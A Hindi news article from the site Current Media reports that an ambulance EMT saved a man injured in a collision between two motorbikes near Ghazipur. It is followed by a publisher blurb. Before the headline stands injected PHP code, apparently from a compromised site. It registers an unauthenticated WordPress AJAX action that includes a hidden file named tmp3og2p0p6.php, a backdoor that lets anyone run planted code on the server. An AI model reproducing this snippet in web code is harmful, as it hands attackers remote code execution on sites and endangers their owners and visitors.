if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }108 एंबुलेंस के ईएमटी की तत्परता से सड़क हादसे मे घायल की जान बची - Current Media
Ghazipur

108 एंबुलेंस के ईएमटी की तत्परता से सड़क हादसे मे घायल की जान बची

गाज़ीपुर । गाज़ीपुर बिरनो थाना के भरसर में हाईवे के पास दो बाइकों की भिड़ंत में एक व्यक्ति गंभीर रूप से घायल हो गया। मौके पर पहुंची 108 एंबुलेंस सेवा के ईएमटी ने समय रहते घायल को प्राथमिक उपचार कर जान बचाई। बिरानो थाना के पास भाड़सर हाइबे पर बाइकों की आपस में जोरदार टक्कर हो गई, जिसमें छोटेलाल यादव (24), निवासी बबुआ बिहार गंभीर रूप से घायल हो गए। राहगीरों ने तुरंत 108 एंबुलेंस को सूचना दी। सूचना मिलते ही एंबुलेंस यूपी UP32EG4465 CHC बिरानो गाज़ीपुर ट्रामा मे मौके पर पहुंची। एंबुलेंस पायलट अजय चौधरी और ईएमटी राजविजय ने घायल को स्ट्रेचर की मदद से एंबुलेंस में शिफ्ट किया। ईएमटी ने स्थिति की गंभीरता को देखते हुए मरीज को तुरंत प्राथमिक उपचार दिया। इसके बाद ईएमटी की सूझबूझ से उच्च डॉक्टर हरीश द्विवेदी की सहायता से मरीज को बेंडजिंग करते हुए डिलोफेनाक इंजेक्शन देकर सुरक्षित रूप से CHC बिरानो गाज़ीपुर में भर्ती कराया गया, जिससे मरीज की जान बच गई ।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

खिरिया घाट पर अवैध खनन के खिलाफ बड़ी कार्रवाई, आधा दर्जन से अधिक ट्रैक्टर-ट्रॉलियां पकड़ीं

झांसी। राशिद पठान । अवैध खनन के खिलाफ प्रशासन ने गुरुवार रात बड़ी कार्रवाई करते …